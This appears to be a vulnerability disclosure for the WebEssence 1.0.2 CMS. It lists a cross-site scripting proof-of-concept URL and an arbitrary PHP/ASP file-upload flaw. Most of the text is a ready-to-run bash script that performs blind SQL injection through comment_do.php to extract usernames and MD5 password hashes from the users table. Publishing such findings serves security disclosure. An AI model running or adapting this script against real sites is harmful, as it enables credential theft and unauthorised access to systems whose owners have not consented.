# # WebEssence 1.0.2 Multiple Vulnerabilities # # Bugs found by white_sheep, R00T_ATI and epicfail # for Debug|Track session @ Backtrack|italia community conference # www.backtrack.it # # # # # # # # # # XSS # # # # # # # # # # # # # PoC: # http://localhost/webessence/webessence/oembed.php?url=http://google.com&id= # In "url" variable is possible to inject a remote HTML page # # # # # # # Remote Shell Uplaod # # # # # # # # PoC: (thanks to emgent) # Unprivileged registered user can upload any PHP or ASP file that can be found in "uploads/other/" # # # # # # Remote Blind Sql Injection # # # # # #!/bin/bash query1="1/**/AND/**/CHAR(" query2=")=(SELECT/**/SUBSTRING(name," query3=",1)/**/FROM/**/users)" url=$1 path=$2 if [ "$1" == "" || "$2" == "" ] then echo "Usage: $0 [url] [path]" echo "Example: $0 http://localhost /webessence" exit fi good=0 position=1 #SEARCH USERNAME echo -n "Username: " while [ $good -lt 1 ] do found="false" for name in `seq 97 122` do NOW=`curl -s -d "name=Ph33r&url=&email=&comment=Ph33r&itemid=$query1$name$query2$position$query3" -H "Referer: $url$path" -H "Content-Type: application/x-www-form-urlencoded" $url$path/comment_do.php` if [ "$NOW" == "" ] then let position+=1 found="true" perl -e "printf '%c', $name;" continue fi done if [ "$found" == "false" ] then good=1 fi done good=0 position=1 query2=")=(SELECT/**/SUBSTRING(pwd," pwd_chr="48 49 50 51 52 53 54 55 56 57 97 98 99 100 101 102" #SEARCH PASSWORD echo "" echo -n "MD5 Pass: " while [ $good -lt 1 ] do found="false" for pwd in $pwd_chr do NOW=`curl -s -d "name=Ph33r&url=&email=&comment=Ph33r&itemid=$query1$pwd$query2$position$query3" -H "Referer: $url$path" -H "Content-Type: application/x-www-form-urlencoded" $url$path/comment_do.php` if [ "$NOW" == "" ] then let position+=1 found="true" perl -e "printf '%c', $pwd;" continue fi done if [ "$found" == "false" ] then good=1 fi done echo ""